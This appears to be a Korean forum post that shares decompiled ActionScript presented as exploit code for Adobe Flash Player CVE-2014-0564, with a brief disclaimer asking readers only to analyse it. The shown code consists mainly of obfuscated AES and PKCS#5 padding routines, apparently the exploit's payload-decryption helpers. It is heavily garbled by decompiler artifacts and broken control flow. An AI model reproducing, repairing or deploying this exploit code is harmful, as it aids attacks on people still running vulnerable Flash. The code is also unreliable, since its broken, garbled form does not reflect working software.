CVE-2014-0564 로 불리우는 Adobe Flash Player의 공격코드를 첨부 합니다

악용하지 마시고..코드 분석만 하세용..

출처 :


*** @PhysicalDrive0 ***

package {
    import flash.utils.*;

    public class _e_-_---_ {

        private var _e_-_---:uint;

        public function _e_-_---_(_arg1:uint=0){
            if (!!(_local3)){
            this._e_-_--- = _arg1;
        public function _e_--__(_arg1:ByteArray):void{
            var _local2:uint = (this._e_-_--- - (_arg1.length % this._e_-_---));
            //unresolved jump
            var _local3:uint = ((((-(0) - 1) - 109) + 13) * 45);
            while (_local3 < _local2) {
                _arg1[_arg1.length] = _local2;
        public function _e_-_-_(_arg1:ByteArray):void{
            //unresolved jump
            var _local4:uint = ((((((0 - 75) + 1) - 1) * 85) + 1) + 111);
            var _local2:uint = (_arg1.length % this._e_-_---);
            if (!!(_local8)){
                //unresolved jump
                if (_local2 != (((((0 - 1) + 1) - 1) * 102) - 104)){
                    //unresolved if
                    throw (new Error("PKCS#5::unpad: ByteArray.length isn't a multiple of the blockSize"));
                //unresolved if
            var _local3:uint = _local2;
            if (!(_local7)){
                while (//unresolved jump
, _local3 > ((((((0 + 79) + 105) - 1) + 1) * 87) - 1)) {
                    if (!!(_local8)){
                        _local4 = _arg1[(_arg1.length - 1)];
                        if (!(_local7)){
                            if (_local2 != _local4){
                                if (!!(_local8)){
                                    throw (new Error((((("PKCS#5:unpad: Invalid padding value. expected [" + _local2) + "], found [") + _local4) + "]")));
                    _local3 = _arg1[(_arg1.length - 1)];
        public function _e_-____-(_arg1:uint):void{
            if (!(_local3)){
                this._e_-_--- = _arg1;

package {
    import flash.utils.*;

    public class _e_-_--_ {

        private static const _e_--_--_:uint = 4;
        private static const _e_-___-_-:Array;
        private static const _e_-:Array;
        private static const _Xtime2Sbox:Array;
        private static const _Xtime3Sbox:Array;
        private static const _Xtime2:Array;
        private static const _Xtime9:Array = [0, 9, 18, 27, 36, 45, 54, 63, 72, 65, 90, 83, 108, 101, 126, 119, 144, 153, 130, 139, 180, 189, 166, 175, 216, 209, 202, 195, 252, 245, 238, 231, 59, 50, 41, 32, 31, 22, 13, 4, 115, 122, 97, 104, 87, 94, 69, 76, 171, 162, 185, 176, 143, 134, 157, 148, 227, 234, 241, 248, 199, 206, 213, 220, 118, 127, 100, 109, 82, 91, 64, 73, 62, 55, 44, 37, 26, 19, 8, 1, 230, 239, 244, 253, 194, 203, 208, 217, 174, 167, 188, 181, 138, 131, 152, 145, 77, 68, 95, 86, 105, 96, 123, 114, 5, 12, 23, 30, 33, 40, 51, 58, 221, 212, 207, 198, 249, 240, 235, 226, 149, 156, 135, 142, 177, 184, 163, 170, 236, 229, 254, 247, 200, 193, 218, 211, 164, 173, 182, 191, 128, 137, 146, 155, 124, 117, 110, 103, 88, 81, 74, 67, 52, 61, 38, 47, 16, 25, 2, 11, 215, 222, 197, 204, 243, 250, 225, 232, 159, 150, 141, 132, 187, 178, 169, 160, 71, 78, 85, 92, 99, 106, 113, 120, 15, 6, 29, 20, 43, 34, 57, 48, 154, 147, 136, 129, 190, 183, 172, 165, 210, 219, 192, 201, 246, 0xFF, 228, 237, 10, 3, 24, 17, 46, 39, 60, 53, 66, 75, 80, 89, 102, 111, 116, 125, 161, 168, 179, 186, 133, 140, 151, 158, 233, 224, 251, 242, 205, 196, 223, 214, 49, 56, 35, 42, 21, 28, 7, 14, 121, 112, 107, 98, 93, 84, 79, 70];
        private static const _e_--____:Array;
        private static const _e_-___-:Array;
        private static const _e_-_-___:Array;

        private static var _e_-_:Array;
        private static var _e_-___-_:ByteArray;
        private static var _e_---___:ByteArray;
        private static var Xtime2Sbox:ByteArray = new ByteArray();
        private static var Xtime3Sbox:ByteArray = new ByteArray();
        private static var Xtime2:ByteArray;
        private static var Xtime9:ByteArray;
        private static var _e_-_-:ByteArray;
        private static var _e_--_---:ByteArray;
        private static var _e_------:ByteArray;
        private static var _e_-_--_-:ByteArray;
        private static var _e_-______:uint;

        private var _e_-__--:ByteArray;
        private var _e_---__:uint;
        private var _e_-__-__:uint;
        private var _e_-___-__:ByteArray;
        private var _e_-_-_-_:ByteArray;

        public function _e_-_--_(_arg1:ByteArray){
            var _local4:Boolean;
            var _local5:Boolean;
            if (!(_local4)){
                this._e_-__-- = new ByteArray();
                if (_local5){
                    if (!_local5){
                        var _temp1 = _local5;
                        _local5 = _temp1;
                    this._e_-___-__ = new ByteArray();
                    //unresolved if
                    if (_local4){
                        var _temp2 = arguments;
                        var _local2 = arguments;
                        _local2 = _temp2;
                        var _local3 = _local3;
                    this._e_-_-_-_ = new ByteArray();
                    //unresolved if
                if (!_local5){
                    _local2 = arguments;
                    if (_local4){
                    _e_-______ = 0;
                    //unresolved if
                    //unresolved if
                if (!!(_local5)){
                    //unresolved if
                    var _temp3 = _local5;
                    _local5 = _temp3;
                    while (//unresolved if
, if (_local4){
                    }, _e_-______ < 0x0100) {
                        if (!_local5){
                            var _temp4 = _arg1;
                            _arg1 = _temp4;
                            _e_-_-[_e_-______] = _e_--____[_e_-______];
                            //unresolved if
                            if (_local5){
                                //unresolved if
                                _local2 = arguments;
                                _e_---___[_e_-______] = _e_-[_e_-______];
                                //unresolved if
                                //unresolved if
                                Xtime2[_e_-______] = _Xtime2[_e_-______];
                            //unresolved if
                            var _temp5 = _local5;
                            _local0 = this;
                            _local5 = _temp5;
                        _e_-___-_[_e_-______] = _e_-___-_-[_e_-______];
                        if (!!(_local5)){
                            //unresolved if
                            _local0 = this;
                            Xtime2Sbox[_e_-______] = _Xtime2Sbox[_e_-______];
                            if (!_local4){
                                if (!_local5){
                                    var _temp6 = _local3;
                                    _local3 = _temp6;
                                Xtime3Sbox[_e_-______] = _Xtime3Sbox[_e_-______];
                                //unresolved if
                                //unresolved if
                                _e_--_---[_e_-______] = _e_-___-[_e_-______];
                                //unresolved if
                                //unresolved if
                                _local2 = arguments;
                                Xtime9[_e_-______] = _Xtime9[_e_-______];
                                //unresolved if
                            //unresolved if
                            var _temp7 = arguments;
                            _local2 = arguments;
                            _local2 = _temp7;
                            _e_------[_e_-______] = _e_-_-___[_e_-______];
                            //unresolved if
                        if (!_local5){
                        _local3 = (_e_-______ + 1);
                        if (_local5){
                            _e_-______ = _local3;
                    if (!_local4){
                        if (!_local5){
                        _e_-______ = 0;
                        //unresolved if
                        while (_e_-______ < _e_-_.length) {
                            _e_-_--_-[_e_-______] = _e_-_[_e_-______];
                            if (!(_local4)){
                                _local3 = (_e_-______ + 1);
                                if (!_local4){
                                    _e_-______ = _local3;
                        //unresolved if
                    this._e_---__ = _arg1.length;
                    if (!!(_local5)){
                        if (_local4){
                            var _temp8 = this;
                            _local0 = this;
                            _local0 = _temp8;
                            //unresolved if
                            //unresolved if
                            _local2 = arguments;
                            var _temp9 = _local3;
                            _local3 = _temp9;
            //unresolved if
            var _temp10 = _local4;
            _local4 = _temp10;
        private function _e_--__-_():void{
            var _local8:Boolean;
            var _local9:Boolean;
            if (!_local8){
            var _local1:uint;
            if (_local9){
            var _local2:uint;
            if (!_local8){
            var _local3:uint;
            if (_local9){
            var _local4:uint;
            if (!_local8){
            var _local5:uint;
            if (!_local8){
            var _local6:uint;
            if (_local9){
            var _local7:uint = (this._e_-__--.length / 4);
            if (!(_local9)){
                if (!_local8){
                this._e_-__-__ = (_local7 + 6);
                if (!(_local9)){
                    if (!!(_local8)){
                        //unresolved if
                    _local6 = _local7;
                    //unresolved if
                for (;if (!_local8){
                }, _local6 < (_e_--_--_ * (this._e_-__-__ + 1));if (!_local8){
                }, if (_local9){
                }, if (!_local8){
                }, if (!_local8){
                }, if (!_local8){
                }, (this._e_-__--[((4 * _local6) + 0)] = (this._e_-__--[(((4 * _local6) - (4 * _local7)) + 0)] ^ _local1)), if (!!(_local8)){
                    //unresolved if
                    var _temp22 = this;
                    _local0 = this;
                    _local0 = _temp22;
                    if (!_local8){
                    if (!_local8){
                    if (_local9){
                    if (_local9){
                    if (_local9){
                    _local0._e_-__--[((4 * _local6) + 2)] = (_local0._e_-__--[(((4 * _local6) - (4 * _local7)) + 2)] ^ _local3);
                    //unresolved if
                }, if (!!(_local8)){
                    //unresolved if
                    var _temp23 = _local1;
                    _local1 = _temp23;
                    if (!!(_local8)){
                        //unresolved if
                        _local4 = _e_-___-_[_local4];
                        //unresolved if
                        //unresolved if
                        var _temp24 = _local2;
                        _local2 = _temp24;
                        if (!!(_local8)){
                    _local6 = _e_-___-_[_local4];
                    //unresolved if
                    _local2 = _e_-___-_[_local2];
                }, //unresolved if
, (_local2 = _local2), (_local9 = _local9), (_local1 = _local1)) {
                    if (_local9){
                        var _temp13 = _local2;
                        var _temp14 = _local2;
                        _local2 = _temp14;
                        _local2 = _temp13;
                    if (!_local8){
                    if (!_local8){
                    //unresolved if
                    _local1 = this._e_-__--[((4 * _local6) - 4)];
                    if (_local8){
                        if (_local9){
                            if (!_local8){
                            //unresolved if
                            _local4 = this._e_-__--[((4 * _local6) - 1)];
                            //unresolved if
                            //unresolved if
                            _local0 = this;
                        if (_local9){
                        if (!_local8){
                        if (!!(_local8)){
                            _local2 = this._e_-__--[((4 * _local6) - 3)];
                            //unresolved if
                            if (_local9){
                            if (!_local8){
                            if (!_local8){
                            if (!_local9){
                                _local3 = this._e_-__--[((4 * _local6) - 2)];
                                //unresolved if
                                //unresolved if
                                if (!_local9){
                                    //unresolved if
                                    //unresolved if
                                    //unresolved if
                                    //unresolved if
                                    if (_local9){
                                    //unresolved if
                                //unresolved if
                            _local5 = this._e_-__--[((4 * _local6) - 2)];
                            //unresolved if
                            if (!_local8){
                                var _temp15 = _local1;
                                _local1 = _temp15;
                                //unresolved if
                                _local2 = _e_-___-_[_local3];
                                //unresolved if
                                if (!_local8){
                                    var _temp16 = _local1;
                                    _local1 = _temp16;
                                //unresolved if
                                _local3 = _e_-___-_[_local5];
                                //unresolved if
                                //unresolved if
                            //unresolved if
                            _local4 = _e_-___-_[_local1];
                            //unresolved if
                            if (!_local8){
                                var _temp17 = _local1;
                                _local1 = _temp17;
                            //unresolved if
                            _local1 = (_e_-___-_[_local2] ^ _e_-_--_-[(_local6 / _local7)]);
                            if (!(_local9)){
                                //unresolved if
                                var _temp18 = _local7;
                                _local7 = _temp18;
                                //unresolved if
                                if (_local9){
                                if (!(_local9)){
                                    //unresolved if
                                    //unresolved if
                                (_local7 > 6);
                                //unresolved if
                            //unresolved if
                        //unresolved if
                        if (!_local8){
                        //unresolved if
                        //unresolved if
                        //unresolved if
                        _local1 = _e_-___-_[_local1];
                        //unresolved if
                    //unresolved if
                    //unresolved if
                    _local3 = _e_-___-_[_local3];
                    //unresolved if
                    //unresolved if
                    var _temp19 = _local8;
                    _local8 = _temp19;
                    if (!_local8){
                    if (!_local8){
                    if (_local9){
                    if (!_local8){
                    if (_local9){
                    this._e_-__--[((4 * _local6) + 3)] = (this._e_-__--[(((4 * _local6) - (4 * _local7)) + 3)] ^ _local4);
                    //unresolved if
                    //unresolved if
                    var _temp20 = _local5;
                    _local5 = _temp20;
                    if (!_local8){
                    if (_local9){
                    if (!_local8){
                    if (_local9){
                    if (_local9){
                    this._e_-__--[((4 * _local6) + 1)] = (this._e_-__--[(((4 * _local6) - (4 * _local7)) + 1)] ^ _local2);
                    //unresolved if
                    //unresolved if
                    var _temp21 = this;
                    _local0 = this;
                    _local0 = _temp21;
            if (_local9){
        public function _e_-_____():uint{
            //unresolved jump
            return (-((-(((16 - 1) * 21)) + 1)));
        public function _e_-_--__(_arg1:ByteArray, _arg2:uint=0):void{
            var _local4:Boolean;
            var _local5:Boolean;
            if (_local5){
            var _local3:uint;
            if (!(_local5)){
                if (_local5){
                this._e_-___-__.position = 0;
                if (!_local5){
                    if (_local5){
                        var _temp1 = this;
                        _local0 = this;
                        _local0 = _temp1;
                        if (!_local4){
                        _local0._e_-_-_-(_local0._e_-__--, 0);
                        //unresolved if
                        //unresolved if
                        var _temp2 = _local3;
                        var _temp3 = _local3;
                        _local3 = _temp3;
                        _local3 = _temp2;
                    if (!_local4){
                    this._e_-___-__.writeBytes(_arg1, _arg2, (_e_--_--_ * 4));
                    if (!_local5){
                        //unresolved if
                        if (!_local4){
                        if (_local4){
                            _local3 = 1;
                            //unresolved if
                            if (_local5){
                            //unresolved jump
                            if (!!(_local4)){
                                if (_local3 < this._e_-__-__){
                                    //unresolved if
                                    //unresolved if
                                    //unresolved jump
                                //unresolved if
                                //unresolved if
                                if (!!(_local4)){
                            if (_local4){
                                //unresolved if
                                _local0 = this;
                                if (_local5){
                                _local0._e_-_-_-(_local0._e_-__--, ((_local3 * _e_--_--_) * 4));
                            //unresolved if
                            var _temp4 = _arg2;
                            _arg2 = _temp4;
                        if (!_local4){
                        //unresolved if
                        if (!!(_local4)){
                            if (!_local4){
                            _arg1.position = _arg2;
                            if (!_local5){
        public function _e_-____-_(_arg1:ByteArray, _arg2:uint=0):void{
            var _local4:Boolean;
            var _local5:Boolean;
            if (!_local4){
            var _local3:uint;
            if (!!(_local4)){
                if (!_local4){
                this._e_-___-__.position = 0;
                if (!!(_local4)){
                    if (_local5){
                        var _temp1 = _arg1;
                        _arg1 = _temp1;
                        if (!_local4){
                        this._e_-_-_-(this._e_-__--, ((this._e_-__-__ * _e_--_--_) * 4));
                        //unresolved if
                        if (_local5){
                        //unresolved if
                        //unresolved if
                    if (_local5){
                    this._e_-___-__.writeBytes(_arg1, _arg2, (_e_--_--_ * 4));
                    if (!(_local5)){
                        //unresolved if
                        var _temp2 = _local3;
                        _local3 = _temp2;
                        if (!(_local5)){
                            //unresolved if
                        _local3 = this._e_-__-__;
                        if (!_local5){
                            if (!_local4){
                            while (if (!!(_local4)){
                                if (_local4){
                            }, _local3) {
                                if (!_local4){
                                this._e_-_-_-(this._e_-__--, ((_local3 * _e_--_--_) * 4));
                                if (!!(_local4)){
                                    //unresolved if
                                    //unresolved if
                            //unresolved if
                    _arg1.position = _arg2;
                    //unresolved if
        public function _e_--():void{
            var _local3:Boolean;
            var _local4:Boolean;
            if (_local3){
            var _local1:uint;
            var _local2:_e_-____-- = new _e_-____--();
            if (_local4){
                if (_local3){
                if (!(_local3)){
                    if (_local4){
                        _local1 = 0;
                        //unresolved if
                        //unresolved jump
                        if (!_local4){
                            var _temp1 = this;
                            _local0 = this;
                            _local0 = _temp1;
                            if (!_local3){
                            //unresolved if
                            //unresolved if
                        this._e_-__--[_local1] = _local2._e_----();
                        //unresolved if
                        var _temp2 = _local1;
                        _local1 = _temp2;
                        //unresolved if
                    //unresolved if
                    //unresolved if
                    if (!_local4){
                    this._e_-__-__ = _local2._e_----();
                    //unresolved if
                    if (!_local4){
                    //unresolved if
                //unresolved if
                _local1 = 0;
                //unresolved if
            while (//unresolved if
, _local1 < this._e_-___-__.length) {
                if (_local3){
                    var _temp3 = this;
                    _local0 = this;
                    _local0 = _temp3;
                    if (_local4){
                    //unresolved if
                    //unresolved if
                    var _temp4 = _local0;
                    _local0 = _temp4;
                this._e_-___-__[_local1] = _local2._e_----();
                //unresolved if
                _local0 = this;
            if (_local4){
                if (!_local4){
                if (_local3){
                if (!_local3){
                    _local1 = 0;
                    //unresolved if
                    //unresolved jump
                    if (_local3){
                        var _temp5 = this;
                        _local0 = this;
                        _local0 = _temp5;
                        if (_local4){
                        //unresolved if
                        //unresolved if
                        var _temp6 = _local2;
                        _local2 = _temp6;
                    this._e_-_-_-_[_local1] = _local2._e_----();
                    //unresolved if
                    var _temp7 = this;
                    _local0 = this;
                    _local0 = _temp7;
                //unresolved if
                if (!!(_local4)){
                    if (_local3){
                    if (_local3){
                    this._e_-__--.length = 0;
                    //unresolved if
                    //unresolved if
                    _local0 = this;
                    _local0._e_-_-_-_ = null;
                    if (!!(_local4)){
                        //unresolved if
                        //unresolved if
                        //unresolved if
                        if (!_local4){
                            var _temp8 = _local1;
                            _local1 = _temp8;
                        if (_local3){
                        _local0._e_-__-__ = 0;
                    //unresolved if
                    if (!_local4){
                    _local0._e_-_-_-_.length = 0;
                    if (!_local4){
                        var _temp9 = _local0;
                        _local0 = _temp9;
                    _local0._e_-__-- = null;
                    //unresolved if
                if (!_local4){
                this._e_-___-__ = null;
                if (!!(_local4)){
                    //unresolved if
                    if (!_local4){
                    this._e_---__ = 0;
            if (_local3){
                var _temp10 = _local3;
                _local3 = _temp10;
            if (_local3){
            this._e_-___-__.length = 0;
            //unresolved if
            var _temp11 = _local2;
            _local2 = _temp11;
        protected function _e_-__-():void{
            var _local2:Boolean;
            var _local3:Boolean;
            if (_local2){
            var _local1:uint;
            if (!!(_local3)){
                if (_local2){
                if (!_local3){
                this._e_-___-__[0] = _e_-___-_[this._e_-___-__[0]];
                //unresolved if
                //unresolved if
                var _temp1 = _local2;
                _local2 = _temp1;
                if (_local2){
                if (!_local3){
                this._e_-___-__[6] = _e_-___-_[this._e_-___-__[14]];
                //unresolved if
                //unresolved if
            if (!_local3){
                _local0 = this;
                if (!_local3){
                if (_local2){
                _local0._e_-___-__[11] = _e_-___-_[_local0._e_-___-__[7]];
                //unresolved if
                if (!!(_local3)){
                    if (!!(_local3)){
                        //unresolved if
                        var _temp2 = _local3;
                        _local3 = _temp2;
                        if (_local2){
                        //unresolved if
                        _local1 = _e_-___-_[_local0._e_-___-__[1]];
                        //unresolved if
                        //unresolved if
                        if (!_local3){
                        //unresolved if
                        //unresolved if
                        _local1 = _e_-___-_[_local0._e_-___-__[6]];
                        //unresolved if
                        //unresolved if
                        var _temp3 = _local2;
                        _local2 = _temp3;
                        if (_local2){
                        if (!_local3){
                        _local0._e_-___-__[8] = _e_-___-_[_local0._e_-___-__[8]];
                        //unresolved if
                        //unresolved if
                        //unresolved if
                        if (!_local3){
                        _local0._e_-___-__[10] = _local1;
                    //unresolved if
                    var _temp4 = _local2;
                    _local2 = _temp4;
                    if (!_local3){
                    if (!_local3){
                    _local0._e_-___-__[15] = _e_-___-_[_local0._e_-___-__[11]];
                //unresolved if
                var _temp5 = _local1;
                _local1 = _temp5;
                if (!_local3){
                _local0._e_-___-__[13] = _local1;
                if (!(_local2)){
                    if (!_local3){
                        var _temp6 = _local2;
                        var _temp7 = _local2;
                        _local2 = _temp7;
                        _local2 = _temp6;
                        if (!_local3){
                        if (!_local3){
                        _local0._e_-___-__[2] = _e_-___-_[_local0._e_-___-__[10]];
                        //unresolved if
                        //unresolved if
                        var _temp8 = _local1;
                        _local1 = _temp8;
                        if (!_local3){
                        if (!_local3){
                        _local0._e_-___-__[1] = _e_-___-_[_local0._e_-___-__[5]];
                        //unresolved if
                        //unresolved if
                    if (!_local3){
                    _local1 = _e_-___-_[_local0._e_-___-__[2]];
                    //unresolved if
                    //unresolved if
                    //unresolved if
                    var _temp9 = _local2;
                    _local2 = _temp9;
                    if (_local2){
                    if (_local2){
                    _local0._e_-___-__[9] = _e_-___-_[_local0._e_-___-__[13]];
                    //unresolved if
                    if (_local2){
                    if (_local2){
                    _local0._e_-___-__[5] = _e_-___-_[_local0._e_-___-__[9]];
                    //unresolved if
                    //unresolved if
                    var _temp10 = _local1;
                    _local1 = _temp10;
                    if (_local2){
                    _local1 = _e_-___-_[_local0._e_-___-__[15]];
                    //unresolved if
                    //unresolved if
                //unresolved if
                if (!_local3){
                if (_local2){
                _local0._e_-___-__[4] = _e_-___-_[_local0._e_-___-__[4]];
                //unresolved if
                if (_local2){
                if (!_local3){
                _local0._e_-___-__[12] = _e_-___-_[_local0._e_-___-__[12]];
                //unresolved if
            if (_local2){
            this._e_-___-__[14] = _local1;
            //unresolved if
            var _temp11 = _local3;
            _local3 = _temp11;
            if (_local2){
            if (_local2){
            this._e_-___-__[7] = _e_-___-_[this._e_-___-__[3]];
            if (!(_local2)){
                if (_local2){
                    var _temp12 = _local1;
                    _local1 = _temp12;
                if (!_local3){
                this._e_-___-__[3] = _local1;
            if (!_local3){
                var _temp13 = _local3;
                _local3 = _temp13;
        protected function _e_-___---():void{
            var _local2:Boolean;
            var _local3:Boolean;
            if (!_local3){
            var _local1:uint;
            if (!!(_local3)){
                if (!_local3){
                if (_local2){
                this._e_-___-__[0] = _e_---___[this._e_-___-__[0]];
                //unresolved if
                //unresolved if
                _local0 = this;
                if (!_local3){
                if (!!(_local3)){
                    _local1 = _e_---___[_local0._e_-___-__[13]];
                    //unresolved if
                    //unresolved if
                    var _temp1 = _local3;
                    _local3 = _temp1;
                    if (!_local3){
                    //unresolved if
                    _local1 = _e_---___[_local0._e_-___-__[2]];
                    //unresolved if
                    //unresolved if
                    var _temp2 = _local2;
                    var _temp3 = _local2;
                    _local2 = _temp3;
                    _local2 = _temp2;
                    if (!_local3){
                    if (!_local3){
                    _local0._e_-___-__[8] = _e_---___[_local0._e_-___-__[8]];
                    //unresolved if
                    //unresolved if
                    if (_local2){
                    //unresolved if
                _local1 = _e_---___[_local0._e_-___-__[13]];
                //unresolved if
                //unresolved if
                if (!_local3){
                    var _temp4 = _local3;
                    _local3 = _temp4;
                    if (_local2){
                    if (_local2){
                    _local0._e_-___-__[5] = _e_---___[_local0._e_-___-__[1]];
                    //unresolved if
                    //unresolved if
                    //unresolved if
                    var _temp5 = _local3;
                    _local3 = _temp5;
                    if (_local2){
                    if (!_local3){
                    _local0._e_-___-__[12] = _e_---___[_local0._e_-___-__[12]];
                    //unresolved if
                    //unresolved if
                    var _temp6 = _local2;
                    _local2 = _temp6;
                    if (_local2){
                    if (_local2){
                    _local0._e_-___-__[13] = _e_---___[_local0._e_-___-__[9]];
                    //unresolved if
                    //unresolved if
                    var _temp7 = _local1;
                    _local1 = _temp7;
                if (!_local3){
                if (!_local3){
                _local0._e_-___-__[3] = _e_---___[_local0._e_-___-__[7]];
                //unresolved if
                //unresolved if
            if (!_local3){
                var _temp8 = _local3;
                _local3 = _temp8;
                if (_local2){
                _local1 = _e_---___[this._e_-___-__[6]];
                //unresolved if
                //unresolved if
                //unresolved if
                var _temp9 = this;
                var _temp10 = _local1;
                _local0 = this;
                _local1 = _temp10;
                _local0 = _temp9;
                if (_local2){
                if (!_local3){
                _local0._e_-___-__[2] = _e_---___[_local0._e_-___-__[10]];
                //unresolved if
                //unresolved if
                var _temp11 = _local1;
                _local1 = _temp11;
                if (!_local3){
                _local0._e_-___-__[15] = _local1;
                //unresolved if
                //unresolved if
                var _temp12 = _local2;
                _local2 = _temp12;
            if (!_local3){
            if (!_local3){
            this._e_-___-__[7] = _e_---___[this._e_-___-__[11]];
            if (!_local2){
                if (!_local3){
                    var _temp13 = this;
                    _local0 = this;
                    _local0 = _temp13;
                    if (!_local3){
                    if (!_local3){
                    _local0._e_-___-__[6] = _e_---___[_local0._e_-___-__[14]];
                    //unresolved if
                    if (_local2){
                        var _temp14 = _local3;
                        _local3 = _temp14;
                    if (_local2){
                    _local0._e_-___-__[14] = _local1;
                    //unresolved if
                    var _temp15 = _local2;
                    _local2 = _temp15;
                    if (_local2){
                    if (_local2){
                    _local0._e_-___-__[4] = _e_---___[_local0._e_-___-__[4]];
                    if (!!(_local3)){
                        //unresolved if
                        if (_local2){
                        _local0._e_-___-__[10] = _local1;
                    //unresolved if
                    var _temp16 = _local1;
                    _local1 = _temp16;
                if (_local2){
                if (_local2){
                this._e_-___-__[11] = _e_---___[this._e_-___-__[15]];
            //unresolved if
            var _temp17 = _local2;
            _local2 = _temp17;
            if (!_local3){
            this._e_-___-__[1] = _local1;
            //unresolved if
            _local0 = this;
            if (_local2){
            if (_local2){
            _local0._e_-___-__[9] = _e_---___[_local0._e_-___-__[5]];
            //unresolved if
            var _temp18 = _local3;
            _local3 = _temp18;
        protected function _e_-___--():void{
            var _local1:Boolean;
            var _local2:Boolean;
            if (_local2){
                if (_local1){
                this._e_-_-_-_.length = 0;
                if (!!(_local2)){
                    //unresolved if
                    _local0 = this;
                    if (_local1){
                    if (!_local2){
                    if (_local1){
                    if (_local1){
                    if (!_local2){
                    _local0._e_-_-_-_[8] = (((Xtime2Sbox[_local0._e_-___-__[8]] ^ Xtime3Sbox[_local0._e_-___-__[13]]) ^ _e_-___-_[_local0._e_-___-__[2]]) ^ _e_-___-_[_local0._e_-___-__[7]]);
                    //unresolved if
                    //unresolved if
            if (!_local2){
                var _temp1 = this;
                _local0 = this;
                _local0 = _temp1;
                if (!_local2){
                _local0._e_-___-__.position = 0;
                //unresolved if
                //unresolved if
                //unresolved if
                var _temp2 = _local0;
                _local0 = _temp2;
                if (_local1){
                if (_local1){
                if (_local1){
                if (!_local2){
                if (!_local2){
                _local0._e_-_-_-_[14] = (((_e_-___-_[_local0._e_-___-__[12]] ^ _e_-___-_[_local0._e_-___-__[1]]) ^ Xtime2Sbox[_local0._e_-___-__[6]]) ^ Xtime3Sbox[_local0._e_-___-__[11]]);
                //unresolved if
                if (!(_local1)){
                    //unresolved if
                    if (!_local2){
                    if (_local1){
                    if (!_local2){
                    if (!_local2){
                    if (_local1){
                    _local0._e_-_-_-_[3] = (((Xtime3Sbox[_local0._e_-___-__[0]] ^ _e_-___-_[_local0._e_-___-__[5]]) ^ _e_-___-_[_local0._e_-___-__[10]]) ^ Xtime2Sbox[_local0._e_-___-__[15]]);
                    //unresolved if
                    //unresolved if
                    var _temp3 = _local0;
                    _local0 = _temp3;
                    if (_local1){
                    if (_local1){
                    if (!_local2){
                    if (_local1){
                    if (_local1){
                    _local0._e_-_-_-_[12] = (((Xtime2Sbox[_local0._e_-___-__[12]] ^ Xtime3Sbox[_local0._e_-___-__[1]]) ^ _e_-___-_[_local0._e_-___-__[6]]) ^ _e_-___-_[_local0._e_-___-__[11]]);
                    //unresolved if
                    //unresolved if
                    //unresolved if
                    if (_local1){
                        var _temp4 = _local1;
                        _local1 = _temp4;
                    if (_local1){
                    if (_local1){
                    if (!_local2){
                    if (!_local2){
                    if (!_local2){
                    _local0._e_-_-_-_[13] = (((_e_-___-_[_local0._e_-___-__[12]] ^ Xtime2Sbox[_local0._e_-___-__[1]]) ^ Xtime3Sbox[_local0._e_-___-__[6]]) ^ _e_-___-_[_local0._e_-___-__[11]]);
                //unresolved if
                //unresolved if
                var _temp5 = _local2;
                _local2 = _temp5;
            if (!_local2){
            if (!_local2){
            if (_local1){
            if (!_local2){
            if (!_local2){
            this._e_-_-_-_[9] = (((_e_-___-_[this._e_-___-__[8]] ^ Xtime2Sbox[this._e_-___-__[13]]) ^ Xtime3Sbox[this._e_-___-__[2]]) ^ _e_-___-_[this._e_-___-__[7]]);
            if (!_local2){
                var _temp6 = _local1;
                _local0 = this;
                _local1 = _temp6;
                if (!_local2){
                if (_local1){
                if (!_local2){
                if (!_local2){
                if (!_local2){
                _local0._e_-_-_-_[15] = (((Xtime3Sbox[_local0._e_-___-__[12]] ^ _e_-___-_[_local0._e_-___-__[1]]) ^ _e_-___-_[_local0._e_-___-__[6]]) ^ Xtime2Sbox[_local0._e_-___-__[11]]);
                if (!(_local1)){
                    //unresolved if
                    //unresolved if
                    var _temp7 = _local1;
                    _local1 = _temp7;
                    if (!_local2){
                    if (!_local2){
                    if (!_local2){
                    if (_local1){
                    if (!_local2){
                    _local0._e_-_-_-_[2] = (((_e_-___-_[_local0._e_-___-__[0]] ^ _e_-___-_[_local0._e_-___-__[5]]) ^ Xtime2Sbox[_local0._e_-___-__[10]]) ^ Xtime3Sbox[_local0._e_-___-__[15]]);
                    //unresolved if
                    //unresolved if
                    if (!_local2){
                    if (!_local2){
                    if (_local1){
                    if (_local1){
                    if (!_local2){
                    _local0._e_-_-_-_[1] = (((_e_-___-_[_local0._e_-___-__[0]] ^ Xtime2Sbox[_local0._e_-___-__[5]]) ^ Xtime3Sbox[_local0._e_-___-__[10]]) ^ _e_-___-_[_local0._e_-___-__[15]]);
                    //unresolved if
                    //unresolved if
                    var _temp8 = _local2;
                    _local2 = _temp8;
                    if (_local1){
                    if (!_local2){
                    if (_local1){
                    if (_local1){
                    if (_local1){
                    _local0._e_-_-_-_[11] = (((Xtime3Sbox[_local0._e_-___-__[8]] ^ _e_-___-_[_local0._e_-___-__[13]]) ^ _e_-___-_[_local0._e_-___-__[2]]) ^ Xtime2Sbox[_local0._e_-___-__[7]]);
                //unresolved if
                //unresolved if
                var _temp9 = _local2;
                var _temp10 = _local2;
                _local2 = _temp10;
                _local2 = _temp9;
            if (_local1){
            if (_local1){
            if (_local1){
            if (_local1){
            if (_local1){
            this._e_-_-_-_[10] = (((_e_-___-_[this._e_-___-__[8]] ^ _e_-___-_[this._e_-___-__[13]]) ^ Xtime2Sbox[this._e_-___-__[2]]) ^ Xtime3Sbox[this._e_-___-__[7]]);
            //unresolved if
            var _temp11 = this;
            var _temp12 = this;
            _local0 = this;
            _local0 = _temp12;
            _local0 = _temp11;
            if (_local1){
            if (_local1){
            _local0._e_-___-__.writeBytes(_local0._e_-_-_-_, 0, (_e_--_--_ * 4));
            if (!_local2){
                var _temp13 = _local1;
                _local1 = _temp13;
                if (_local1){
                if (_local1){
                if (!_local2){
                if (_local1){
                if (!_local2){
                _local0._e_-_-_-_[0] = (((Xtime2Sbox[_local0._e_-___-__[0]] ^ Xtime3Sbox[_local0._e_-___-__[5]]) ^ _e_-___-_[_local0._e_-___-__[10]]) ^ _e_-___-_[_local0._e_-___-__[15]]);
                if (!!(_local2)){
                    //unresolved if
                    var _temp14 = _local0;
                    _local0 = _temp14;
                    if (!_local2){
                    if (_local1){
                    if (_local1){
                    if (_local1){
                    if (_local1){
                    _local0._e_-_-_-_[5] = (((_e_-___-_[_local0._e_-___-__[4]] ^ Xtime2Sbox[_local0._e_-___-__[9]]) ^ Xtime3Sbox[_local0._e_-___-__[14]]) ^ _e_-___-_[_local0._e_-___-__[3]]);
                    if (_local1){
                    if (!_local2){
                    if (_local1){
                    if (!_local2){
                    if (!_local2){
                    if (_local1){
